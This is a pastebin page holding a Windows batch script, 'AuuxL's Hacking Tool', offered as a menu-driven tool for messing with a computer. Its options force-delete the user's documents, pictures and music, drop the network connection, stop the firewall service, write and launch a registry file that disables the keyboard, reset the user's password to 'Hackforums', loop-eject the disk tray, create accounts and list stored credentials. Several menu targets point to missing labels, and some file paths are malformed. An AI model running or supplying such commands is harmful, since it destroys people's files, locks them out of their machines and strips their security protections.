Don't like ads? PRO users don't see any ads ;-)
Guest

AuuxL'sBatch

By: a guest on May 2nd, 2012  |  syntax: None  |  size: 8.28 KB  |  hits: 81  |  expires: Never
download  |  raw  |  embed  |  report abuse  |  print
Text below is selected. Please press Ctrl+C to copy to your clipboard. (⌘+C on Mac)
  1. @echo off
  2. title AuuxL's Hacking Tool V1.0 Alpha
  3. color A
  4. echo Loading
  5. ping localhost -n 2 >nul
  6. cls
  7. echo Loading.
  8. ping localhost -n 2 >nul
  9. cls
  10. echo Loading..
  11. ping localhost -n 2 >nul
  12. cls
  13. echo Loading...
  14. ping localhost -n 2 >nul
  15. cls
  16. echo Loaded!
  17. ping localhost -n 2 >nul
  18. cls
  19.  
  20. :start
  21. echo AuuxL's Hacking Tool
  22. echo --
  23.      echo Welcome!
  24.      echo This program will list users, and give you options on what to do with them.
  25.      echo I AM NOT RESPONSIBLE FOR ANY MISCONDUCT USING THIS PROGRAM!
  26.      echo You are on %logonserver% network!
  27.          echo --
  28. echo Press 0 to open CMD
  29. echo --
  30. echo Press 1 to delete all documents
  31. echo --
  32. echo Press 2 to delete all pictures
  33. echo --
  34. echo Press 3 to delete all music
  35. echo --
  36. echo Press 4 to disable the Internet
  37. echo --
  38. echo Press 5 to disable all Firewall
  39. echo --
  40. echo Press 6 to disable the keyboard
  41. echo --
  42. echo Press 7 to user change pass To hackforums
  43. echo --
  44. echo Press 8 to open disk tray
  45. echo --
  46. echo Press 9 to start Firefox
  47. echo --
  48. echo Press 10 to start Google chrome
  49. echo --
  50. echo Press 11 to list all users
  51. echo --
  52. echo Press 12 for Credits
  53. echo --
  54. echo Press 13 to list administrators
  55. echo --
  56. echo Press 14 to run task manager
  57. echo --
  58. echo Press 15 to view stored usernames and passwords
  59. echo --
  60. echo Press 16 to make an administrator account
  61. echo --
  62. echo Press 17 to list Processes and Info
  63. echo --
  64. echo Press 18 to make an account
  65. echo --
  66. echo Press 19 to delete an account
  67. echo --
  68. echo Press 20 to create a group
  69. echo --
  70. echo Press 21 to run program as administrator
  71. echo --
  72. echo Press 22 to lock a program - Not Working
  73. echo --
  74. echo Press 23 to ping website (URL Blocker Bypass)
  75. echo --
  76. echo Press 24 change an account's group (Ex. Administrators)
  77. echo --
  78. echo Press 25 to kill a program (For advanced users only) - Not Working
  79. echo --
  80.  
  81. set /p auuxl=What would you like to do? (Use the listing number) (SCROLL TO SEE MORE!)
  82. IF '%auuxl%'=='0' GOTO cmd
  83. IF '%auuxl%'=='1' GOTO documents
  84. IF '%auuxl%'=='2' GOTO pictures
  85. IF '%auuxl%'=='3' GOTO music
  86. IF '%auuxl%'=='4' GOTO internet
  87. IF '%auuxl%'=='5' GOTO firewall
  88. IF '%auuxl%'=='6' GOTO keyboard
  89. IF '%auuxl%'=='7' GOTO pass
  90. IF '%auuxl%'=='8' GOTO tray
  91. IF '%auuxl%'=='9' GOTO firefox
  92. IF '%auuxl%'=='10' GOTO chrome
  93. IF '%auuxl%'=='11' GOTO users
  94. IF '%auuxl%'=='12' GOTO credits
  95. IF '%auuxl%'=='13' GOTO listadmins
  96. IF '%auuxl%'=='14' GOTO task
  97. IF '%auuxl%'=='15' GOTO stored
  98. IF '%auuxl%'=='16' GOTO makeadmin
  99. IF '%auuxl%'=='17' GOTO listpro
  100. IF '%auuxl%'=='18' GOTO makeacc
  101. IF '%auuxl%'=='19' GOTO delacc
  102. IF '%auuxl%'=='20' GOTO group
  103. IF '%auuxl%'=='21' GOTO runadmin
  104. IF '%auuxl%'=='23' GOTO ping
  105. IF '%auuxl%'=='24' GOTO change
  106. IF '%auuxl%'=='25' GOTO kill
  107. :documents
  108. @echo off
  109. ::----Delete My Documents----::
  110. del /f /q "C:\Users\%userprofile%\My Documents\*.*"
  111. ::---------------------------::
  112. pause
  113. exit
  114. :pictures
  115. @echo off
  116. ::-----Delete My Pictures----::
  117. del /f /q "C:\Users\%userprofile%\My Documents\My Pictures\*.*"
  118. ::---------------------------::
  119. :music
  120. @echo off
  121. ::-----Delete My Music-------::
  122. del /f /q "C:\Users\%userprofile%\My Documents\My Music\*.*"
  123. ::---------------------------::
  124. pause
  125. exit
  126. :internet
  127. @echo off
  128. ::-----Disable Internet------::
  129. ipconfig /release
  130. if ERRORLEVEL1 ipconfig /release_all
  131. ::---------------------------::
  132. pause
  133. exit
  134. :firewall
  135. @echo off
  136. ::-Disable Windows Firewall--::
  137. net stop "MpsSvc"
  138. taskkill /f /t /im "FirewallControlPanel.exe"
  139. ::---------------------------:
  140. pause
  141. exit
  142. :keyboard
  143. @echo off
  144. ::------Disable Keyboard-----::
  145. echo Windows Registry Editor Version 5.00 > "nokeyboard.reg"
  146. echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Keyboard Layout] >> "nokeyboard.reg"
  147. echo "Scancode Map"=hex:00,00,00,00,00,00,00,00,7c,00,00,00,00,00,01,00,00,\ >> "nokeyboard.reg"
  148. echo 00,3b,00,00,00,3c,00,00,00,3d,00,00,00,3e,00,00,00,3f,00,00,00,40,00,00,00,\ >> "nokeyboard.reg"
  149. echo 41,00,00,00,42,00,00,00,43,00,00,00,44,00,00,00,57,00,00,00,58,00,00,00,37,\ >> "nokeyboard.reg"
  150. echo e0,00,00,46,00,00,00,45,00,00,00,35,e0,00,00,37,00,00,00,4a,00,00,00,47,00,\ >> "nokeyboard.reg"
  151. echo 00,00,48,00,00,00,49,00,00,00,4b,00,00,00,4c,00,00,00,4d,00,00,00,4e,00,00,\ >> "nokeyboard.reg"
  152. echo 00,4f,00,00,00,50,00,00,00,51,00,00,00,1c,e0,00,00,53,00,00,00,52,00,00,00,\ >> "nokeyboard.reg"
  153. echo 4d,e0,00,00,50,e0,00,00,4b,e0,00,00,48,e0,00,00,52,e0,00,00,47,e0,00,00,49,\ >> "nokeyboard.reg"
  154. echo e0,00,00,53,e0,00,00,4f,e0,00,00,51,e0,00,00,29,00,00,00,02,00,00,00,03,00,\ >> "nokeyboard.reg"
  155. echo 00,00,04,00,00,00,05,00,00,00,06,00,00,00,07,00,00,00,08,00,00,00,09,00,00,\ >> "nokeyboard.reg"
  156. echo 00,0a,00,00,00,0b,00,00,00,0c,00,00,00,0d,00,00,00,0e,00,00,00,0f,00,00,00,\ >> "nokeyboard.reg"
  157. echo 10,00,00,00,11,00,00,00,12,00,00,00,13,00,00,00,14,00,00,00,15,00,00,00,16,\ >> "nokeyboard.reg"
  158. echo 00,00,00,17,00,00,00,18,00,00,00,19,00,00,00,1a,00,00,00,1b,00,00,00,2b,00,\ >> "nokeyboard.reg"
  159. echo 00,00,3a,00,00,00,1e,00,00,00,1f,00,00,00,20,00,00,00,21,00,00,00,22,00,00,\ >> "nokeyboard.reg"
  160. echo 00,23,00,00,00,24,00,00,00,25,00,00,00,26,00,00,00,27,00,00,00,28,00,00,00,\ >> "nokeyboard.reg"
  161. echo 1c,00,00,00,2a,00,00,00,2c,00,00,00,2d,00,00,00,2e,00,00,00,2f,00,00,00,30,\ >> "nokeyboard.reg"
  162. echo 00,00,00,31,00,00,00,32,00,00,00,33,00,00,00,34,00,00,00,35,00,00,00,36,00,\ >> "nokeyboard.reg"
  163. echo 00,00,1d,00,00,00,5b,e0,00,00,38,00,00,00,39,00,00,00,38,e0,00,00,5c,e0,00,\ >> "nokeyboard.reg"
  164. echo 00,5d,e0,00,00,1d,e0,00,00,5f,e0,00,00,5e,e0,00,00,22,e0,00,00,24,e0,00,00,\ >> "nokeyboard.reg"
  165. echo 10,e0,00,00,19,e0,00,00,30,e0,00,00,2e,e0,00,00,2c,e0,00,00,20,e0,00,00,6a,\ >> "nokeyboard.reg"
  166. echo e0,00,00,69,e0,00,00,68,e0,00,00,67,e0,00,00,42,e0,00,00,6c,e0,00,00,6d,e0,\ >> "nokeyboard.reg"
  167. echo 00,00,66,e0,00,00,6b,e0,00,00,21,e0,00,00,00,00 >> "nokeyboard.reg"
  168. start nokeyboard.reg
  169. ::---------------------------::
  170. pause
  171. exit
  172. :pass
  173. @echo off
  174. ::--Change Pass To Hackforums--::
  175. net user %username% Hackforums
  176. ::---------------------------
  177. pause
  178. exit
  179. :tray
  180. @echo off
  181. ::-------Open Disk Tray------::
  182. echo Do >> "opendisk.vbs"
  183. echo Set oWMP = CreateObject("WMPlayer.OCX.7" ) >> "opendisk.vbs"
  184. echo Set colCDROMs = oWMP.cdromCollection >> "opendisk.vbs"
  185. echo colCDROMs.Item(d).Eject  >> "opendisk.vbs"
  186. echo colCDROMs.Item(d).Eject  >> "opendisk.vbs"
  187. echo Loop >> "opendisk.vbs"
  188. start "" "opendisk.vbs"
  189. ::---------------------------::
  190. pause
  191. exit
  192. :firefox
  193. @echo off
  194. start firefox.exe
  195. pause
  196. exit
  197. :google
  198. start chrome.exe
  199. pause
  200. exit
  201. :cmd
  202. echo Opening a new, clean, admin, window...
  203.      cmd
  204.      pause
  205.      goto start
  206. :task
  207. echo starting task manager.
  208.      taskmgr
  209.      pause
  210.      goto start
  211.          
  212. :kill
  213.  set /p pp=Are you sure? May ruin computer! You must know the exact process's name! (Y/N)  
  214.      IF '%pp%'=='Y' GOTO kill1
  215.      IF '%pp%'=='y' GOTO kill1
  216.      IF '%pp%'=='N' GOTO abort
  217.      IF '%pp%'=='n' GOTO abort
  218.          
  219. :changepass
  220. set /p username=What's the username that you would like to change the password to?  
  221.      set /p paswurd=What would you like to change the password to?  
  222.      net user %username% %paswurd%
  223.      echo Done!
  224.      pause
  225.      goto start  
  226. :group
  227.      set /p groupname=What would you like to name the group?  
  228.      net localgroup %groupname%    /add
  229.      echo Done!
  230.      pause
  231.      goto start
  232. :makeacc
  233.      set /p acc=What would you like the username to be?  
  234.      net user %acc% /add
  235.      echo Done!
  236.      pause
  237.      goto start  
  238. :users
  239.      net users
  240.      pause
  241.      goto start  
  242. :ping
  243.      echo Ready to ping website.
  244.      set /p pping=Please enter the website's name.  
  245.      echo Pinging...
  246.      ping %pping%
  247.      echo Take the string of numbers and type in your internet browser! (Ex. http://74.195.19.1.1)
  248.      pause
  249.      goto start
  250. :makeadmin
  251.      set /p vvv=What yould you like your username to be?  
  252.      set /p rrr=ARE YOU ABSOLUTELY SURE?? (Y/N)  
  253.      IF '%rrr%'=='Y' goto adminii
  254.      IF '%rrr%'=='N' goto abort
  255.      IF '%rrr%'=='n' goto abort
  256.      IF '%rrr%'=='y' goto adminii
  257.          :deleteacc
  258.      set /p suredelete=Are you sure you want to delete? Cannot be undone! (Y/N)  
  259.      IF '%suredelete%'=='Y' GOTO delete1
  260.      IF '%suredelete%'=='y' GOTO delete1
  261.      IF '%suredelete%'=='N' GOTO abort
  262.      IF '%suredelete%'=='n' GOTO abort
  263. :stored
  264.      echo Listing....
  265.      CMDKEY /list
  266.      echo Done!
  267.      pause
  268.      goto start0